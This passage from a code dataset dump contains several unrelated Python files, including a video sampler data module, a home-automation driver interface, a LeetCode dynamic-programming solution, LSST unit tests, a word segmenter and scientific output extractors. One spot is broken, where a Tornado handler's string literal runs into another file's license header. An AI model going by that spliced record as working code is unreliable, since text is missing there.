rewrite_browser_list(self):\n return self.browser_data.generate_browser_list()\n\n def return_browser_list(self):\n return self.browser_data.browser_list\n\n @staticmethod\n def get_settings_data():\n return read_json(SETTINGS_JSON)\n\n @staticmethod\n def get_sampler_data():\n return read_json(BANK_DATA_JSON)\n\n def get_next_context(self):\n ######## loads the slot details, uses settings to modify them and then set next slot number ########\n next_slot_number = read_json(NEXT_SLOT_JSON)\n memory_bank = read_json(BANK_DATA_JSON)\n next_slot_details = memory_bank[next_slot_number]\n start_value = next_slot_details['start']\n end_value = next_slot_details['end']\n length = next_slot_details['length']\n\n use_rand_start, use_sync_length, sync_length, playback_mode = self._get_context_options_from_settings()\n\n if use_rand_start and use_sync_length:\n start_value = randint(0, length - sync_length)\n end_value = start_value + sync_length\n elif use_rand_start and not use_sync_length:\n start_value = randint(0, end_value)\n elif not use_rand_start and use_sync_length:\n end_value = min(length, start_value + sync_length)\n\n self._set_next_slot_number_from_playback_mode(playback_mode, next_slot_number)\n\n context = dict(location=next_slot_details['location'], name=next_slot_details['name'],\n length=next_slot_details['length'], start=start_value, end=end_value,\n slot_number=next_slot_number)\n return context\n\n def update_slot_start_to_this_time(self, slot_number, position):\n memory_bank = read_json(BANK_DATA_JSON)\n memory_bank[slot_number]['start'] = position\n update_json(BANK_DATA_JSON, memory_bank)\n\n def update_slot_end_to_this_time(self, slot_number, position):\n memory_bank = read_json(BANK_DATA_JSON)\n memory_bank[slot_number]['end'] = position\n update_json(BANK_DATA_JSON, memory_bank)\n\n def _get_length_for_file(self, path):\n print('getting length for: {}'.format(path))\n if self.has_omx:\n temp_player = OMXPlayer(path, args=['--alpha', '0'], dbus_name='t.t')\n duration = temp_player.duration()\n temp_player.quit()\n return duration\n else:\n return -1\n\n def _get_path_for_file(self, file_name):\n ######## returns full path for a given file name ########\n for root, dirs, files in os.walk(PATH_TO_BROWSER):\n if file_name in files:\n return True, '{}/{}'.format(root, file_name)\n return False, ''\n\n @staticmethod\n def _update_a_slots_data(slot_number, slot_info):\n ######## overwrite a given slots info with new data ########\n memory_bank = read_json(BANK_DATA_JSON)\n memory_bank[slot_number] = slot_info\n update_json(BANK_DATA_JSON, memory_bank)\n\n @staticmethod\n def _cycle_setting_value(setting):\n ######## contains the valid setting values for each applicable option ########\n if setting['name'] == 'PLAYBACK_MODE':\n if setting['value'] == 'SAMPLER':\n setting['value'] = 'PLAYLIST'\n elif setting['value'] == 'PLAYLIST':\n setting['value'] = 'RANDOM'\n else:\n setting['value'] = 'SAMPLER'\n elif setting['name'] == 'SYNC_LENGTHS':\n if setting['value'] == 'ON':\n setting['value'] = 'OFF'\n else:\n setting['value'] = 'ON'\n elif setting['name'] == 'RAND_START':\n if setting['value'] == 'ON':\n setting['value'] = 'OFF'\n else:\n setting['value'] = 'ON'\n elif setting['name'] == 'VIDEO_OUTPUT':\n if setting['value'] == 'HDMI':\n setting['value'] = 'COMPOSITE'\n else:\n setting['value'] = 'HDMI'\n elif setting['name'] == 'DEV_MODE':\n if setting['value'] == 'ON':\n setting['value'] = 'OFF'\n else:\n setting['value'] = 'ON'\n\n return setting\n\n @staticmethod\n def _get_context_options_from_settings():\n ######## looks up the settings data object and returns states of relevant options ########\n settings = read_json(SETTINGS_JSON)\n use_sync_length = False\n sync_length = 0\n use_rand_start = False\n playback_mode = ''\n\n for index, setting in enumerate(settings):\n if setting['name'] == 'SYNC_LENGTHS' and setting['value'] == 'ON':\n use_sync_length = True\n elif setting['name'] == 'SYNC_LENGTHS_TO':\n sync_length = setting['value']\n elif setting['name'] == 'RAND_START' and setting['value'] == 'ON':\n use_rand_start = True\n elif setting['name'] == 'PLAYBACK_MODE':\n playback_mode = setting['value']\n\n return use_rand_start, use_sync_length, sync_length, playback_mode\n\n @staticmethod\n def _set_next_slot_number_from_playback_mode(playback_mode, current_slot_number):\n ######## sets next slot number by using playback mode logic ########\n next_slot_number = 0\n if playback_mode == 'SAMPLER':\n next_slot_number = current_slot_number\n elif playback_mode == 'RANDOM':\n #TODO: actually find which slots have value and only use those\n next_slot_number = randint(0,14)\n elif playback_mode == 'PLAYLIST':\n #TODO: implement some playlist objects and logic at some point\n next_slot_number = current_slot_number\n update_json('next_slot_number.json',next_slot_number)\n\n @staticmethod\n def _try_import_omx():\n try:\n from omxplayer.player import OMXPlayer\n return True\n except:\n return False\n\n\n\n\n\n\n\n","sub_path":"data_centre/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"464777659","text":"\"\"\"\n@name: Modules/Core/Drivers/interface.py\n@author: D. Brian Kimmel\n@contact: D.BrianKimmel@gmail.com\n@copyright: (c) 2013-2019 by D. Brian Kimmel\n@license: MIT License\n@note: Created on Mar 21, 2013\n@summary:\n\n\nControllers, which are attached to the server, communicate with the server via an interface.\nThere are several different interfaces at this point (2013-10-29):\n Serial\n USB - Includes HID variant\n Ethernet (Tcp)\n Null\n\nThis module reads and writes the Config for those controllers.\n\"\"\"\n\n__updated__ = '2019-09-07'\n__version_info__ = (19, 9, 1)\n__version__ = '.'.join(map(str, __version_info__))\n\n# Import system type stuff\n\n# Import PyMh files\nfrom Modules.Core.Drivers.Serial import Serial_driver\nfrom Modules.Core.Utilities.debug_tools import PrettyFormatAny\n\nfrom Modules.Core import logging_pyh as Logger\nLOG = Logger.getLogger('PyHouse.Interface ')\n\n\nclass DriverInterfaceInformation:\n \"\"\"\n ...Interface.xxxx\n \"\"\"\n\n def __init__(self):\n self.Type = None # Null, Ethernet, Serial, USB, HTML, Websockets, ...\n self.Host = None\n self.Port = None\n self._DriverApi = None # Serial_driver.API()\n # Type specific information follows\n\n\ndef _get_interface_type(p_device_obj):\n return p_device_obj.Interface.Type.lower()\n\n\ndef get_device_driver_API(p_pyhouse_obj, p_controller_obj):\n \"\"\"\n Based on the InterfaceType of the controller, load the appropriate driver and get its API().\n @return: a pointer to the device driver or None\n \"\"\"\n # LOG.debug(PrettyFormatAny.form(p_controller_obj, 'Controller'))\n # LOG.debug(PrettyFormatAny.form(p_controller_obj.Interface, 'Interface'))\n l_dev_name = p_controller_obj.Interface\n l_type = _get_interface_type(p_controller_obj)\n if l_type == 'serial':\n l_driver = Serial_driver.API(p_pyhouse_obj)\n\n elif l_type == 'ethernet':\n from Modules.Core.Drivers.Ethernet import Ethernet_driver\n l_driver = Ethernet_driver.API(p_pyhouse_obj)\n\n elif l_type == 'usb':\n from Modules.Core.Drivers.USB import USB_driver\n l_driver = USB_driver.API(p_pyhouse_obj)\n\n else:\n LOG.error('No driver for device: {} with interface type: {}'.format(\n l_dev_name, p_controller_obj.Interface.Type))\n from Modules.Core.Drivers.Null import Null_driver\n l_driver = Null_driver.API(p_pyhouse_obj)\n\n p_controller_obj.Interface._DriverApi = l_driver\n l_driver.Start(p_controller_obj)\n return l_driver\n\n\nclass Config:\n \"\"\" This abstracts the interface information.\n Used so far for lighting controllers.\n Allows for yaml config files to have a section for \"Interface:\" without defining the contents of that section;\n getting that information is the job of the particular driver XXX\n\n Interface:\n Type: Serial\n Host: pi-01-pp\n Port: /dev/ttyUSB0\n \n ...\n \"\"\"\n\n def load_interface(self, p_config):\n \"\"\"\n \"\"\"\n l_obj = DriverInterfaceInformation()\n l_required = ['Type', 'Host', 'Port']\n for l_key, l_value in p_config.items():\n # LOG.debug('Interface {}: = {}'.format(l_key, l_value))\n setattr(l_obj, l_key, l_value)\n # Check for data missing from the config file.\n for l_key in [l_attr for l_attr in dir(l_obj) if not l_attr.startswith('_') and not callable(getattr(l_obj, l_attr))]:\n if getattr(l_obj, l_key) == None and l_key in l_required:\n LOG.warn('Controller Yaml is missing an entry for \"{}\"'.format(l_key))\n # Append the type specific data to the Object\n if l_obj.Type == 'Serial':\n Serial_driver.Config().load_serial_config(p_config, l_obj)\n return l_obj\n\n# ## END DBK\n","sub_path":"Project/src/Modules/Core/Drivers/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16304096","text":"\"\"\"\n309. Best Time to Buy and Sell Stock with Cooldown\n\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (ie, buy one and sell one share of the stock multiple times) with the following restrictions:\n\nYou may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again).\nAfter you sell your stock, you cannot buy stock on next day. (ie, cooldown 1 day)\nExample:\n\nInput: [1,2,3,0,2]\nOutput: 3\nExplanation: transactions = [buy, sell, cooldown, buy, sell]\n\n\n\"\"\"\n\n\nclass BestTimeSellStockWithCooldown:\n\n def doit_dp(self, prices):\n n = len(prices)\n dp = [[0] * 3 for _ in range(n + 1)]\n # 0 sold, 1 held, 2 reset\n dp[0][0], dp[0][1], dp[0][2] = float('-inf'), float('-inf'), 0\n\n for i in range(1, n + 1):\n dp[i][0] = dp[i - 1][1] + prices[i - 1]\n dp[i][1] = max(dp[i - 1][1], dp[i - 1][2] - prices[i - 1])\n dp[i][2] = max(dp[i - 1][2], dp[i - 1][0])\n\n return max(dp[n][0], dp[n][2])\n\n \"\"\"\n Approach 1: Dynamic Programming with State Machine\n Intuition\n\n First of all, let us take a different perspective to look at the problem, unlike the other algorithmic problems.\n\n Here, we will treat the problem as a game, and the trader as an agent in the game. The agent can take actions that lead to gain or lose of game points (i.e. profits). And the goal of the game for the agent is to gain the maximal points.\n\n In addition, we will introduce a tool called state machine, which is a mathematical model of computation. Later one will see how the state machine coupled with the dynamic programming technique can help us solve the problem easily.\n\n In the following sections, we will first define a state machine that is used to model the behaviors and states of the game agent.\n\n Then, we will demonstrate how to apply the state machine to solve the problem.\n\n Definition\n\n Let us define a state machine to model our agent. The state machine consists of three states, which we define as follows:\n\n state held: in this state, the agent holds a stock that it bought at some point before.\n\n state sold: in this state, the agent has just sold a stock right before entering this state. And the agent holds no stock at hand.\n\n state reset: first of all, one can consider this state as the starting point, where the agent holds no stock and did not sell a stock before. More importantly, it is also the transient state before the held and sold. Due to the cooldown rule, after the sold state, the agent can not immediately acquire any stock, but is forced into the reset state. One can consider this state as a \"reset\" button for the cycles of buy and sell transactions.\n\n At any moment, the agent can only be in one state. The agent would transition to another state by performing some actions, namely:\n\n action sell: the agent sells a stock at the current moment. After this action, the agent would transition to the sold state.\n\n action buy: the agent acquires a stock at the current moment. After this action, the agent would transition to the held state.\n\n action rest: this is the action that the agent does no transaction, neither buy or sell. For instance, while holding a stock at the held state, the agent might simply do nothing, and at the next moment the agent would remain in the held state.\n\n Now, we can assemble the above states and actions into a state machine, which we show in the following graph where each node represents a state, and each edge represents a transition between two states. On top of each edge, we indicate the action that triggers the transition.\n \"\"\"\n\n def doit_dp_1(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n sold, held, reset = float('-inf'), float('-inf'), 0\n\n for price in prices:\n # Alternative: the calculation is done in parallel.\n # Therefore no need to keep temporary variables\n #sold, held, reset = held + price, max(held, reset-price), max(reset, sold)\n\n pre_sold = sold\n sold = held + price\n held = max(held, reset - price)\n reset = max(reset, pre_sold)\n\n return max(sold, reset)\n\n\nif __name__ == '__main__':\n\n BestTimeSellStockWithCooldown().doit_dp_1([1,2,4])\n\n BestTimeSellStockWithCooldown().doit_dp([1, 2, 4])\n\n\n","sub_path":"PythonLeetcode/leetcodeM/309_BestTimeToBuyAndSellStockWithCooldown.py","file_name":"309_BestTimeToBuyAndSellStockWithCooldown.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453648769","text":"# LED demo for ESP8266\nfrom machine import Pin\nimport time\n\nled_no = [32, 33, 25, 26]\n\n\ndef switch_off():\n for led in leds:\n led.off()\n\n\nleds = list()\nfor i in range(len(led_no)):\n led = Pin(led_no[i], Pin.OUT)\n leds.append(led)\n\nwhile True:\n for led in leds:\n switch_off()\n led.on()\n time.sleep(1)\n","sub_path":"ESP32/led_ESP32.py","file_name":"led_ESP32.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45817781","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n __init__.py\n @author yf\n @version\n Copyright (c) 2013 yufeng All rights reserved.\n\"\"\"\nimport tornado.web\nimport tornado.web, hmac, hashlib, datetime, json #, functools, urllib, os\nfrom tornado.escape import json_decode\nfrom tornado import escape\nimport decimal\nimport logging as l\n\ndef _default(obj):\n if isinstance(obj, datetime.datetime):\n return obj.strftime('%Y-%m-%dT%H:%M:%S')\n elif isinstance(obj, datetime.date):\n return obj.strftime('%Y-%m-%d')\n elif isinstance(obj, decimal.Decimal):\n return str(obj)\n else:\n return obj\n\nclass base(tornado.web.RequestHandler):\n @property\n def db(self):\n return self.application.db\n\n def get_current_user(self):\n uid = self.get_secure_cookie(\"u\")\n u = self.db.user(id=uid).one()\n if u:\n return self.get_secure_cookie(\"u\")\n return None\n\n def write(self, chunk):\n if isinstance(chunk, dict):\n cb = self.get_argument(\"callback\", None)\n if cb is not None:\n super(base, self).write(cb + '(' + json.dumps(chunk) + ')')\n self.set_header('Content-Type', 'application/javascript')\n else:\n chunk = json.dumps(chunk, default=_default).replace('.\n#\nimport os\nimport sys\nimport unittest\n\nimport lsst.afw.geom\nimport lsst.utils.tests\nfrom lsst.utils import getPackageDir\nfrom lsst.geom import arcseconds, Extent2I\nimport lsst.obs.base.tests\nimport lsst.obs.test\n\n\nclass TestObsTest(lsst.obs.base.tests.ObsTests, lsst.utils.tests.TestCase):\n \"\"\"Run standard obs_base unit tests.\n \"\"\"\n def setUp(self):\n product_dir = getPackageDir('obs_test')\n data_dir = os.path.join(product_dir, 'data', 'input')\n\n butler = lsst.daf.persistence.Butler(root=data_dir)\n mapper = lsst.obs.test.TestMapper(root=data_dir)\n dataIds = {'raw': {'visit': 1, 'filter': 'g'},\n 'bias': {'visit': 1},\n 'flat': {'visit': 1},\n 'dark': unittest.SkipTest\n }\n self.setUp_tests(butler, mapper, dataIds)\n\n ccdExposureId_bits = 41\n exposureIds = {'raw': 1, 'bias': 1, 'flat': 1}\n filters = {'raw': 'g', 'bias': '_unknown_', 'flat': 'g'}\n exptimes = {'raw': 15.0, 'bias': 0.0, 'flat': 0.0}\n detectorIds = {'raw': 0, 'bias': 0, 'flat': 0}\n detector_names = {'raw': '0', 'bias': '0', 'flat': '0'}\n detector_serials = {'raw': '0000011', 'bias': '0000011', 'flat': '0000011'}\n dimensions = {'raw': Extent2I(1026, 2000),\n 'bias': Extent2I(1018, 2000),\n 'flat': Extent2I(1018, 2000)\n }\n sky_origin = (79.24521968, -9.702295415)\n raw_subsets = (({'level': 'sensor', 'filter': 'g'}, 2),\n ({'level': 'sensor', 'visit': 1}, 1),\n ({'level': 'filter', 'visit': 1}, 1),\n ({'level': 'visit', 'filter': 'g'}, 2)\n )\n linearizer_type = unittest.SkipTest\n\n path_to_raw = os.path.join(data_dir, \"raw\", \"raw_v1_fg.fits.gz\")\n raw_header_wcs = lsst.afw.geom.makeSkyWcs(lsst.afw.fits.readMetadata(path_to_raw))\n\n self.setUp_butler_get(ccdExposureId_bits=ccdExposureId_bits,\n exposureIds=exposureIds,\n filters=filters,\n exptimes=exptimes,\n detectorIds=detectorIds,\n detector_names=detector_names,\n detector_serials=detector_serials,\n dimensions=dimensions,\n sky_origin=sky_origin,\n raw_subsets=raw_subsets,\n linearizer_type=linearizer_type,\n raw_header_wcs=raw_header_wcs\n )\n\n keys = set(('filter', 'name', 'patch', 'tract', 'visit', 'pixel_id', 'subfilter',\n 'fgcmcycle', 'numSubfilters', 'label', 'detector', 'expId', 'subdir'))\n query_format = [\"visit\", \"filter\"]\n queryMetadata = (({'visit': 1}, [(1, 'g')]),\n ({'visit': 2}, [(2, 'g')]),\n ({'visit': 3}, [(3, 'r')]),\n ({'filter': 'g'}, [(1, 'g'), (2, 'g')]),\n ({'filter': 'r'}, [(3, 'r')]),\n )\n map_python_type = 'lsst.afw.image.DecoratedImageU'\n map_cpp_type = 'DecoratedImageU'\n map_storage_name = 'FitsStorage'\n metadata_output_path = os.path.join('processCcd_metadata', 'v1_fg.yaml')\n raw_filename = 'raw_v1_fg.fits.gz'\n default_level = 'visit'\n raw_levels = (('skyTile', set(['filter'])),\n ('filter', set(['filter', 'visit'])),\n ('visit', set(['filter', 'visit']))\n )\n self.setUp_mapper(output=data_dir,\n path_to_raw=path_to_raw,\n keys=keys,\n query_format=query_format,\n queryMetadata=queryMetadata,\n metadata_output_path=metadata_output_path,\n map_python_type=map_python_type,\n map_cpp_type=map_cpp_type,\n map_storage_name=map_storage_name,\n raw_filename=raw_filename,\n default_level=default_level,\n raw_levels=raw_levels,\n )\n\n self.setUp_camera(camera_name='test',\n n_detectors=1,\n first_detector_name='0',\n plate_scale=20 * arcseconds,\n )\n\n super(TestObsTest, self).setUp()\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\ndef setup_module(module):\n lsst.utils.tests.init()\n\n\nif __name__ == '__main__':\n setup_module(sys.modules[__name__])\n unittest.main()\n","sub_path":"tests/test_obs_test.py","file_name":"test_obs_test.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44111089","text":"#!/usr/bin/env python\n# _*_coding:utf-8 _*_\n# @Author:Zhang Shiwei\n# @Date :2020/4/15\n\n\"\"\"\n基于词典的后向最大匹配分词算法\n\"\"\"\n\n\ndef add_dict(dictfile):\n \"\"\"\n 加载词典\n :param dictfile: 词典文件\n :return:\n \"\"\"\n f_dict = open(dictfile, \"r\", encoding=\"utf-8\")\n max_length = 1\n dictionary = list()\n for line in f_dict.readlines():\n dictionary.append(line.strip())\n if len(line.strip()) > max_length:\n max_length = len(line.strip())\n f_dict.close()\n return dictionary, max_length\n\n\ndef segment(rawfile, dictfile):\n \"\"\"\n 后向最大匹配分词\n :param rawfile: 待分词文本\n :param dictfile: 词典文件\n :return:\n \"\"\"\n dictionary, max_length = add_dict(dictfile)\n f_raw = open(rawfile, \"r\", encoding=\"utf-8\")\n f_result = open(\"seg_results/backward.txt\", \"w\", encoding=\"utf-8\")\n for line in f_raw.readlines():\n words = list() # 存储一句话分好的单词\n line = line.strip()\n while len(line) > 0:\n max_len = len(line) if len(line) < max_length else max_length # 当前尝试的分词长度\n try_word = line[-max_len:]\n while try_word not in dictionary: # 不断在词典中查找当前单词\n if len(try_word) == 1:\n break\n else:\n try_word = try_word[1:]\n words.append(try_word)\n line = line[:-len(try_word)]\n # 写入结果\n while words:\n word = words.pop()\n f_result.write(word + \"|\")\n f_result.write(\"\\n\")\n\n f_raw.close()\n f_result.close()\n\n\ndef main():\n segment(\"origin.txt\", \"dict.txt\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"word_segment/backward_max_match_segment.py","file_name":"backward_max_match_segment.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275141926","text":"# '''\n# 소인수분해\n# 1. 수 받음(n)\n# 2. 2~n 까지 소수 나열 (에라토스테네스 체 활용)\n# 3. n을 작은 소수부터 나누어 보기, 반복\n# 4. 1이 되면 멈춤\n# '''\n\n# n = int(input()) # 소인수 분해 할 수\n\n# if n != 1:\n# decimal_bool = [True for i in range(n+1)]\n\n# for i in range(2, int(n**0.5) + 1): # 남은 수 중 아직 처리하지 않은 i\n# if decimal_bool[i] == True:\n# j = 2\n# while i*j <= n:\n# decimal_bool[i*j] = False # i의 배수 모두 제거\n# j += 1\n\n# decimal = [i for i in range(2, n+1) if decimal_bool[i]] # 소수 리스트\n\n# left = n\n# while True: # 소인수분해\n# if left == 1: # 더이상 나눌 것이 없다면(1이라면) 끝\n# break\n# for i in decimal:\n# if left%i == 0: # 특정 소수로 나누어지면 출력하고 나누어줌\n# print(i)\n# left = left/i\n# break\n\n# 위에처럼 해도 가능, 그러나 시간 초과 걸림\n# 굳이 소수만 제거할 필요 없이, 그냥 순서대로 해도 괜찮을 듯\n\nn = int(input()) # 소인수분해할 수\n\nj = 2 # 나눌 수(소수)\nwhile True:\n if n == 1:\n break\n elif n%j == 0:\n print(j)\n n = n/j\n else:\n j += 1","sub_path":"1_백준/1_단계별학습/09_기본_수학_2/3_11653.py","file_name":"3_11653.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"141616239","text":"import tensorflow as tf \nfrom tools.data_pool import DataPool\nimport os\n\nDATA_REAL_PATH = \"./data/arxiv.txt\"\nFROZEN_GRAPH_FILE = \"./frozen/graph.pb\"\n\ndef _main(params, data_path):\n with tf.gfile.GFile(FROZEN_GRAPH_FILE, \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n graph = tf.Graph()\n with graph.as_default():\n tf.import_graph_def(\n graph_def,\n input_map = None,\n return_elements = None,\n name = \"trained\",\n op_dict = None,\n producer_op_list = None\n )\n inputs = graph.get_tensor_by_name('trained/input:0')\n predict = graph.get_tensor_by_name('trained/infer:0')\n\n infer_data_pool = DataPool(data_path, params.batch_size, params.seq_length)\n\n with tf.Session(graph=graph) as sess:\n for steps, text_inputs in enumerate(next(infer_data_pool)):\n feed_dict={\n 'trained/input:0': text_inputs,\n }\n\n ret = sess.run(\"trained/infer:0\", feed_dict=feed_dict)\n print(ret)\n break\n\n\n\nif __name__ == \"__main__\":\n\n data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), DATA_REAL_PATH)\n \n params = AttrDict(\n batch_size=2,\n seq_length=1140,\n vocab_size=86,\n rnn_hidden=86,\n output_size=86,\n learning_rate=0.1,\n momentum=0.5,\n gradient_clipping=0.5\n )\n\n _main(params, data_path)","sub_path":"cha6_rnn/4_seq_generation/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371647185","text":"import turtle\n\nleonardo = turtle.Turtle()\n\ndef draw_square(some_turtle):\n global running\n for i in range(1,5):\n if not running: break;\n some_turtle.forward(100)\n some_turtle.right(90)\ndef draw_art():\n global running\n window = turtle.Screen()\n leonardo.shape(\"turtle\")\n leonardo.color(\"blue\")\n leonardo.speed(10)\n for i in range(1,36):\n if not running: break;\n draw_square(leonardo)\n leonardo.right(10)\n \n window.exitonclick()\n \ndef stop(x,y): \n global running\n running = False\n\nleonardo.screen.onclick(stop)\n\nrunning = True\n\ndraw_art()\n","sub_path":"draw_with_turtle.py","file_name":"draw_with_turtle.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421964326","text":"import os\nimport errno\n\nfrom kapacitor.udf.agent import Agent\nfrom htm_aggr_handler import HTMAggrHandler\n\nfrom data.file_logger import FileLogger\n\n\nclass Accepter(object):\n \"\"\"\n Accepter implementation for accepting new connections.\n Initializes new Agent with HTMAggrHandler.\n \"\"\"\n _count = 0\n\n def __init__(self, logger, store_results=False):\n self._logger = logger\n self.store_results = store_results\n\n def accept(self, conn, addr):\n self._count += 1\n\n a = Agent(conn, conn)\n h = HTMAggrHandler(a, flogger=self.__get_flogger())\n a.handler = h\n\n self._logger.info(\"Starting Agent for connection %d\", self._count)\n \n try:\n a.start()\n a.wait()\n except IOError as e:\n self._logger.error(e.strerror) \n\n self._logger.info(\"Agent finished connection %d\", self._count)\n a.handler = None\n\n def __get_flogger(self):\n \"\"\"\n If file logging is enabled,\n create a new file logger and return it.\n \"\"\"\n\n if not self.store_results:\n return None\n\n logpath = os.getenv('LOG_DIR_PATH', '/tmp/log')\n\n # Create log directory\n if not os.path.exists(logpath):\n try:\n os.makedirs(logpath)\n except OSError as err:\n if err.errno != errno.EEXIST:\n raise\n\n flogger = FileLogger(os.path.join(\n logpath,\n 'scores_{}.csv'.format(self._count)\n ))\n flogger.write_init()\n return flogger\n","sub_path":"satel_nupic/server/accepter.py","file_name":"accepter.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183392930","text":"#!usr/bin/env python\n# import modules here\n# use mpi4py to process output parallelly\nimport h5py\nimport numpy as np\nimport sys\nimport os\nimport pandas as pd\nsys.path.append('/n/home10/xiangtao/projects_code/EDPyUtils/')\nimport ed2_utils\nimport argparse\n\n# default values for input\n\n#####################################################\n# parse the argument\nparser = argparse.ArgumentParser(description='Parse ED run prefixes to process')\nparser.add_argument('-p','--prefix', help='prefixes to process'\n ,nargs='+' # allow for multiple arguments under this flag\n ,type = str) \nparser.add_argument('-pft','--pft', help='pft list'\n ,nargs='+' # allow for multiple arguments under this flag\n ,type = int) \nparser.add_argument('-lon','--lon', help='longitude'\n ,type = float) \nparser.add_argument('-time','--lt', help='local time [HH:MM:SS]'\n ,nargs='+' # allow for multiple arguments under this flag\n ,type = str) \nargs = parser.parse_args()\n\nif len(args.prefix) > 0:\n pf_array = np.array(args.prefix)\n print(pf_array)\n\nif len(args.pft) > 0:\n pft_list = args.pft\n\nsite_lon = args.lon\nlocal_time_list = np.array(args.lt)\n####################################################\n\n# convert local time to UTC time\nunit_fast = 3600. \n# time interval of fast output, this will determine how we\n# round the observational time\n\n\nutc_time_list = []\ntime_lag = site_lon / 360. * 24. # hours\nfor itime, time_str in enumerate(local_time_list):\n # first convert time_str to hour of day\n hod = float(time_str[0:2]) + float(time_str[3:5]) / 60. + float(time_str[6:8]) / 3600.\n\n utc_hod = np.mod(hod - time_lag,24)\n\n # round to the nearest half hour\n # TODO: to be removed later\n utc_hod = np.around(utc_hod * 2.) / 2.\n\n # round upward to the nearest unit_fast time point\n utc_hod = np.ceil(utc_hod * 3600. / unit_fast ) / (3600. / unit_fast)\n\n # convert to str\n utc_hod_str = '{:02d}{:02d}{:02d}'.format(\n int(np.floor(utc_hod)),int((utc_hod-np.floor(utc_hod)) * 60.),\n 0)\n utc_time_list.append(utc_hod_str)\n\n\n\noutput_path = '/n/moorcroftfs5/xiangtao/ED_output/amazon_vod'\noutput_yeara = 2001\noutput_yearz = 2010\n\n#pft_list = [2,3,4]\n\n# create pf list\n\nfor pf_name in pf_array:\n\n\n # use height monthly\n size_list = ('H',np.arange(0,50+1,5))\n voi_avg=['MMEAN_GPP_PY','MMEAN_NEP_PY','MMEAN_SENSIBLE_LC_PY',\n 'MMEAN_VAPOR_LC_PY','MMEAN_VAPOR_WC_PY','MMEAN_VAPOR_GC_PY','MMEAN_VAPOR_AC_PY',\n 'MMEAN_TRANSP_PY']\n voi_avg_pft = ['MMEAN_LAI','AGB','BA','NPLANT']\n voi_pft_size = ['MMEAN_LAI','NPLANT','AGB','BA']\n\n csv_fn = '{:s}_monthly.csv'.format(pf_name)\n site_name=pf_name.split('_')[0]\n ed2_utils.extract_ed2_monthly(\n '{:s}/{:s}/{:s}'.format(output_path,site_name,pf_name),\n csv_fn,\n output_yeara,1,\n output_yearz,12,\n voi_avg=voi_avg,voi_avg_pft=voi_avg_pft,\n voi_pft_size=voi_pft_size,\n pft_list = pft_list,size_list=size_list)\n\n\n # extract obs time output\n# voi_size = ['LAI','FMEAN_LEAF_WATER_INT','FMEAN_LEAF_WATER'\n# ,'FMEAN_LEAF_PSI']\n# voi_pft_size = ['LAI','FMEAN_LEAF_WATER_INT','FMEAN_LEAF_WATER',\n# 'FMEAN_LEAF_PSI']\n#\n#\n# # use LAI\n# size_list = ('LAI',np.arange(0,5.1,0.5))\n# csv_fn = '{:s}_obs_LAIsize.csv'.format(pf_name)\n# site_name=pf_name.split('_')[0]\n# ed2_utils.extract_ed2_fast(\n# '{:s}/{:s}/{:s}'.format(output_path,site_name,pf_name),\n# csv_fn,\n# output_yeara,1,1,\n# output_yearz,12,31,\n# utc_time_list,\n# voi_avg=[],voi_avg_pft=[],\n# voi_size = voi_size,\n# voi_pft_size=voi_pft_size,\n# pft_list = pft_list,size_list=size_list)\n#\n# # use height\n# size_list = ('H',np.arange(0,50+1,5))\n# csv_fn = '{:s}_obs_Hsize.csv'.format(pf_name)\n# site_name=pf_name.split('_')[0]\n# ed2_utils.extract_ed2_fast(\n# '{:s}/{:s}/{:s}'.format(output_path,site_name,pf_name),\n# csv_fn,\n# output_yeara,1,1,\n# output_yearz,12,31,\n# utc_time_list,\n# voi_avg=[],voi_avg_pft=[],\n# voi_size = voi_size,\n# voi_pft_size=voi_pft_size,\n# pft_list = pft_list,size_list=size_list)\n\n\n\n\n\n\n\n","sub_path":"ED2-Amazon/post_proc/extract_vod_output.py","file_name":"extract_vod_output.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488960154","text":"import random\nimport numpy as np\n\ndef chunk(l, n):\n return np.array_split(np.array(l),n)\nclass SMA:\n\n def __init__(self,pop_size, max_group_size,local_leader_limit, global_leader_limit,\n pr, fitness_func, dir_min_max, conditional_func, minimize=False):\n self.groups = []\n self.global_leader_count = 0\n self.population = []\n self.pop_size = pop_size\n self.global_leader = None\n self.local_leader_limit = local_leader_limit\n self.global_leader_limit = global_leader_limit\n self.pr = pr\n self.fitness_func = fitness_func\n self.dir_min_max = dir_min_max\n self.max_group_size = max_group_size\n self.conditional_func = conditional_func\n self.iter_count = 0\n self.minimize = minimize\n self.min_max_f = min if self.minimize else max\n\n @staticmethod\n def 